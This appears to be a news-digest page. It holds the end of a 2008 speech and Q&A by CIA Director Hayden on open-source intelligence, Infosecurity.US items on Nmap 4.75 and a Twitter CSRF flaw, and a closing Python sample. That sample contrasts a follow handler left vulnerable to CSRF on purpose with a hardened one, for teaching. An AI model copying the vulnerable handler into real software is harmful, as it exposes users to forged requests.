So he says, when I criticize the government, I must go into the bathroom?  (Laughter.)  And he said, why don't we put another microphone over here?  And then they begin to criticize him.  What kind of person are you?  There are only a limited number of microphones in Cuba!  (Laughter.)  There's a family down the street that criticizes the government day and night.  They have 11 kids and they're only allotted one microphone.

It gave me a new appreciation for life and thought and the situation on the island.  And, again, back to riding trains to Kazanlak, it's out there; it's available, but you have to access.  And you access that truth in a way that's different from running agents against a foreign government.  Now, given that importance to this discipline, Doug sits at my staff meetings each time they occur, and that's three days a week.  Open source has a seat at the table, a seat at the table with every other core discipline that comprises the Central Intelligence Agency.  We think it's a key component of our own strategic blueprint, which we call our strategic intent; that's how important we think this is.

Now, as I indicated a few minutes ago, my job as executive agent for the Open Source Center is to help it achieve those two primary goals: one, a highly effective collector and producer in its own right, the production line; and, second, to be a catalyst for the larger community, for the open source enterprise about which you heard Doug talk about yesterday.

So how are we doing?  Well, one irony of working the open source side of the intelligence business, not unlike every other part of the intelligence business, is that the better we do, the less we can talk about it.  We are often addressing requirements or questions that are sensitive by nature.  The information is unclassified, our interest in it is not.

Open source, by the way, is now routinely packaged with the other ints in making our products out of our DI.  And I can assure you that on a recurring basis, you see open source material – cited as open source – in items in the President's Daily Brief.  It's also true that, from time to time, there are items in the President's Daily Brief that are exclusively derived from open source and carry the logo not of DIA or NSA or CIA, but carry the logo to the President of the Open Source Center.

It contributes open source intelligence to national security in unique and valuable ways.  Take recent events – take this jump-ball, Russia-Georgia and now think about how open source could contribute to that.  How about what's going on in Pakistan?  Think how open source can contribute to that and I think you have a pretty good idea of the kinds of things that open source can offer all of us.  It's invaluable.  We couldn't claim to do all-source analysis.

How can you be all-source, which is what we claim to be, if Doug and his folks are not part of our team?  And that's a baseline that helps us to find, by the way, what's truly secret, what is not accessible in these ways, and allows us better to focus our espionage energy on those things.

Open source also helps us understand how others view the world.  Without that understanding, we'd fail in our obligation to provide insight, not just information, but insight.  Last spring, I was out at the Kansas State University as part of their Landon Lecture Series.  And one of the points I wanted the students to take away from my time with them was how crucial it was for us as a nation to understand others, to understand others' viewpoints, friends and adversaries.  We can't be myopic, see things only through an American lens.  It's arrogant, but it's worse than arrogant; it's dangerous.  The lecture out at Kansas State focused on the growing complexity of the world and the fact that international relations in this century will be shaped by a greater number and more diverse set of actors than they were in the last century.  And the overriding challenges presented to those of us responsible for national security is that we now must do a far better job understanding cultures, histories, religions, and traditions that are not our own, or at least are not as represented even in our immigrant nation as much as our traditional cultures have been.

Open source officers have an important role in giving us that window.  They expose us to perspectives we might not otherwise see.  They broaden our understanding of the world.  That's fundamental to our mission.  Now, let me talk for a minute about goal number two, you know, the advocate, the sponsor, the facilitator, the responsibility to lead the community in unleashing the full potential of open source.

We can be proud.  We've made progress here as well.  Some examples – Open Source Center now provides the White House Situation Room with 340 real-time feeds from television broadcasts around the world.  It provides data that highlights to our commands like EUCOM through a customized Internet portal.  It's formed new collaborative relationships with foreign partners.

Remember the comment I mentioned where Hayden and Kappes went out there and visited 50 liaison partners?  In several of those instances, the takeaway, the thing we brought home, was a new relationship between their open source enterprise and our open source enterprise as well.  We're taking advantage of expertise across the spectrum from NGA headquarters in Bethesda to the Foreign Military Studies office at Fort Leavenworth, Kansas, to the Asian studies detachment at Camp Zama, Japan.

Open Source Center is expanding its training from officers across the community.  Half of the Open Source Academy students this year work for organizations other than the Central Intelligence Agency.  Perhaps most importantly, the center is making more intelligence-related content available to more people in government than ever before.

Fifteen thousand people, state and local, Congress, policy-makers regularly use opensource.gov.  Now, we want to build on that momentum, and that's what drove the action plan that I know Doug's already talked to you about.  It's strategic in nature, but he and I have talked.  This isn't about moon-shots or dreams; it's about practical, near-term, incremental objectives.  I think we've set the path and now it's simply time to execute.

Now, one of the things we're going to do to help Doug execute is to change governance a bit for the open source enterprise, not the center, but the open source enterprise.  So today I'd like to tell you a bit about the creation of a new community-wide governance board that will guide us as we move forward.  The Open Source Board of Governors will consist primarily of open source producers and stakeholders throughout the Intelligence Community.  And what we want to be able to do is to lead an integrated approach to exploiting openly available information.  The board of governors will set strategies and priorities for the open source enterprise based on the input from all who want to ensure its success.

We see this board of governors as a forum where consensus can be reached on how best to use our collective resources today and in the future.  It will consider things like IT strategy and IT policy.  How do we wire up together?  The centralization of services, services of common concern like training or content-acquisition, things like standardization, standardization of tradecraft.  The idea is to set direction and priorities in a way that allow each of the players, each of the elements of the open source enterprise to develop and make the most of their capabilities.

We've had this for the past year for one of the other functions at CIA.  In addition to being the executive agent for the Open Source Center, I am the national HUMINT manager.  In that hat, we have a national HUMINT board of governors in which anyone who's collecting information from our species has a seat at the table.  And we have been able, through consensus, to develop a set of priorities and standards that we will be able to use across the board in human intelligence collection and reporting.

Well, why can't we do that in open source as well?  The open source board will meet quarterly.  The first session will take place before the end of the year and at that meeting, we'll set a work plan for the coming calendar year with key milestones and decision points.

Now, yesterday, as I know all of you know, we marked a solemn anniversary, seven years since the attack on our homeland.  That one terrible day prompted action across our community on many levels.  And I think the IC, the Intelligence Community, can be proud of the work that it's done in the last seven years.  Together with partners across our country and across the world, we have kept the United States safe.

But we owe it to our people, the American people, never to be fully satisfied with the job we're doing.  We owe it to them to constantly ask the question, how can we better do this?  How can we better achieve our mission?  There is abundant evidence that we're asking that question and challenging ourselves now more than ever in the open source arena.

So I'm delighted to be here today.  I'm even more delighted to see you here today representing the organizations of which you are a part, but maybe more fundamentally representing the enthusiasm that is now out there for this incredibly important discipline.

Thank you then for your energy and your dedication.  It inspires us as we continue to serve our fellow citizens to the best of our ability.  And with that, I'd be happy to take any comments or questions you might have in the time remaining to us.  Thank you.

(Applause.)

MS. SABRA HORNE (ODNI Senior Advisor for Open Source/Outreach):  Thank you so much, General Hayden.  We have four questions for you that we've taken from the audience.  I'll start with the first one.  "This conference sponsored an open source analytic contest, an unclassified mini National Intelligence Estimate, if you will.  Why doesn't the IC publish unclassified NIEs that could be subject to the peer review of the open source community?"

DIRECTOR HAYDEN:  Okay, what do the other three look like?  (Laughter.)  I don't know if all of you know this, but even the classified NIEs are subject to peer review.  There are outside readers for even the most highly classified National Intelligence Estimates.  So that's very important.  So in terms of the discipline, even at the highest levels of classification, we do get outsiders to come in and give us a view.  So I think that's very important.

I guess the second observation I'd make is that the NIEs are kind of the capstone documents.  In fact, in some cases, they criticize them, looking at Mark here, too capstone, too ethereal.  But when they hit the sweet spot, when they bring in all of the threads of information in a digestible body for a policy-maker to actually think and decide on something that's quite important.  So I guess what I'd underscore to you there – it's all source.  It brings them all in so that the policy-maker can have all of the data that we have available to him in one place.

Now, that is not to undersell the independent analysis that's done in the unclassified world in which we, frankly, shamelessly, try to leverage and exploit in our own classified work.

MS. HORNE:  "With respect to the phrase 'Open source is good,' do you believe open source is a double-edged sword?  We need to always understand how adversaries can use our open source information against us.  And what is being done about this problem?"

DIRECTOR HAYDEN:  Yeah.  Every intelligence discipline has the challenge you just described.  Vince Fragamini (sp) was my deputy when I became a brigadier and I was the EUCOM J-2.  And Vince was a career Navy Intelligence Officer.  He had run their intel school down at Dam Neck before he came out to Stuttgart to be the J-2.  Vince had a great phrase: live by SIGINT, die by SIGINT.  (Laughter.)  And it wasn't designed to be critical of SIGINT, it's just that SIGINT has the tendency to be out there on your breaking-edge news so you get the SIGINT report and Vince had another phrase: when in doubt, put it out, okay?  (Laughter.)  But then he would always remind me: live by SIGINT, die by SIGINT.

And I guess what I'm trying to describe for you is the problem of deception is present in every intelligence discipline, whether you're listening to someone, whether you're observing someone or something, or whether you're meeting with someone personally.  And it doesn't have to be deception in terms of being intentional.  This guy may be giving his impression of a meeting.  How many of you had that guy talk to you, okay?  The guy gave you an impression of the meeting which is at total variance with everyone else who was in the room?

Well, when we intercept that conversation, that becomes intelligence and we report on it in the same way in which we would be looking at that individual's remarks were he giving them at a press conference following the aforementioned meeting.  So this problem of sorting through is present in all of our disciplines so I think what I'd suggest to you is, open source, just like every other stream of intelligence available to us, has to be vetted and has to be bumped up one against the other in order to find out the best version of truth.

MS. HORNE:  "We've spoken of the importance and key role of open source.  Within the CIA, the unclassified resources, infrastructure, and support has lagged behind the classified.  How will the CIA put the unclassified and open source infrastructure on equal footing?"

DIRECTOR HAYDEN:  It's a challenge, you know, truth in lending among friends, these are not easy budget decisions, but we have made the commitment to strengthen this discipline.  And I should add, too, this discipline's budget is set off for special scrutiny, set off from the rest of CIA's budget so that it is visible and observed not just by me, but by people north of me in the organization chart.

Now, we recognize that this does require investment.  Somewhat like the SIGINT enterprise, which I was familiar with in my time at NSA, you really need an awful lot of computational power and IT and storage to handle the kinds of volume we now get in American SIGINT and which Doug now has to deal with in American open source reporting.  So it requires investment.  We're committed to that, but it's a balancing act; a little more over here means a little less over there.  We just have to do the best we can.

I should add, too, we do recognize we're digging out of a deficit here.  This is probably one discipline in which we have underinvested and we have to play some catch-up.

MS. HORNE:  And, finally, "How do we encourage more experiences like your Bulgarian open source experience?"

DIRECTOR HAYDEN:  One of the things we're doing – and we're very serious about this – we're trying to shove our analysts out the door, off of Langley, and push them forward.  So a significant fraction of our analytic workforce now does its work – I mean, it does what it would be doing at CIA Headquarters, but it's not doing it at CIA Headquarters; it's doing it at forward locations.

Now, a lot of those would be in Iraq or Afghanistan in direct support of what's going on there.  But there's also an awful lot who are not there, that are in other locations and the idea there is, well, to step back and put this into a second context.  Half of our analysts have been hired in the last six years.  So I go to Michael Morell or John Kringen and before him and say, we need more experience in our analytic workforce.

And I'm accustomed, as a former GI, you know, I know how long it takes America's Army to build a battalion commander; it takes 18 to 19 years, then someone is a lieutenant colonel and he's ready to command a battalion.  So I go to Michael or to John and say, how long would it take to build us an analyst with 20 years' experience?  (Laughter.)

And the answer they come back with is frankly unacceptable.  (Laughter.)  We have found, pushing analysts forward into the area in which they report, the things they think about, accelerates this experiential curve.  And why does it accelerate the experiential curve?  Because the first newspaper they read in the morning is a local newspaper in the local language; the last thing they look at, at night before they go to bed is the local news in the local language.  They know whether things are comfortable or uncomfortable, the population is tight or relaxed because they're on the metro with them, I mean, all of those things that an attaché can absorb, we're trying to do that for our analysts as well.

So I think, in its own way, perhaps indirectly, it's doing that kind of acculturation that I underwent when I was serving in Sofia back in the 1980s.

Thanks very much.

MS. HORNE:  Thank you, General Hayden, for your comments.  And we especially appreciate your appreciation and advocacy for open source.

Thank you.

Nmap 4.75 Released [Infosecurity.US]

Posted: 12 Sep 2008 03:54 PM CDT

Insecure.org has announced the release of Nmap 4.75, with nearly 100 significant enhancements since version 4.68. Certainly, one compelling reason to upgrade from a previous version is the application's ability to graphically map network topologies.

Dubbed the Zenmap Network Topology, the graphical mapping utility generates an interactive, animated map of the hosts on a network and their interconnections.

Another Twitter Vulnerability [Infosecurity.US]

Posted: 12 Sep 2008 03:23 PM CDT

DARKNET reports, in a follow-on (no pun intended) post, yet another Twitter vulnerability; this time a CSRF (Cross-Site Request Forgery) vulnerability which apparently permits forced following.

From the post:

“Last week, TechCrunch's Jason Kincaid wrote about an obvious Twitter vulnerability that allowed a user called "johng77536" to game the popular micro-blogging service to add thousands of followers (subscribers) in a short period of time.

The "johng77536" account has since been disabled but a security researcher tracking Twitter security flaws and weaknesses has discovered a new vulnerability that lets users easily game the "follow" system.”
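The class of flaw described above, modelled as an added example that is not Twitter's or Darknet's code: a hypothetical "follow" endpoint that trusts the session cookie alone, beside one that also requires a POST, a matching Origin header and a per-session synchronizer token. All names, origins and session values here are constructed.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Set

# Assumed first-party origin of the hypothetical site (constructed value).
SITE_ORIGIN = "https://social.example"


@dataclass
class Session:
    user: str
    following: Set[str] = field(default_factory=set)
    # Per-session synchronizer token, issued once and embedded only in
    # first-party forms; a third-party page never learns it.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    origin: Optional[str]      # Origin header value, None when absent
    cookies: Dict[str, str]    # the browser attaches these on cross-site requests too
    form: Dict[str, str]


def follow_vulnerable(req: Request, sessions: Dict[str, Session]) -> str:
    """Acts on the session cookie alone: a form on another site, submitted by the
    victim's browser, carries that cookie and is accepted (the forced-follow flaw)."""
    sess = sessions.get(req.cookies.get("sid", ""))
    if sess is None:
        return "401 not logged in"
    sess.following.add(req.form["target"])
    return "200 now following " + req.form["target"]


def follow_hardened(req: Request, sessions: Dict[str, Session]) -> str:
    """Same action, with three independent cross-site checks."""
    sess = sessions.get(req.cookies.get("sid", ""))
    if sess is None:
        return "401 not logged in"
    # 1. State changes only via POST, so a bare link or <img> cannot trigger them.
    if req.method != "POST":
        return "405 method not allowed"
    # 2. Browsers send Origin on cross-site POSTs and scripts cannot forge it.
    if req.origin != SITE_ORIGIN:
        return "403 cross-site origin rejected"
    # 3. Token must match the session's token; constant-time compare on bytes.
    supplied = req.form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, sess.csrf_token.encode()):
        return "403 missing or invalid csrf token"
    sess.following.add(req.form["target"])
    return "200 now following " + req.form["target"]


def demo() -> Dict[str, str]:
    """Runs a cross-site request and a legitimate one against each handler and
    returns the responses, so the difference between the two is visible."""
    results = {}
    for name, handler in (("vulnerable", follow_vulnerable), ("hardened", follow_hardened)):
        sessions = {"abc123": Session(user="victim")}   # constructed session store
        cookies = {"sid": "abc123"}
        # Form auto-submitted from an unrelated site; no token, foreign Origin.
        cross_site = Request("POST", "https://other.example", cookies, {"target": "spammer"})
        # First-party form submission carrying the session's own token.
        legit = Request("POST", SITE_ORIGIN, cookies,
                        {"target": "friend", "csrf_token": sessions["abc123"].csrf_token})
        results[name + "_cross_site"] = handler(cross_site, sessions)
        results[name + "_legit"] = handler(legit, sessions)
        results[name + "_following"] = ",".join(sorted(sessions["abc123"].following))
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```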
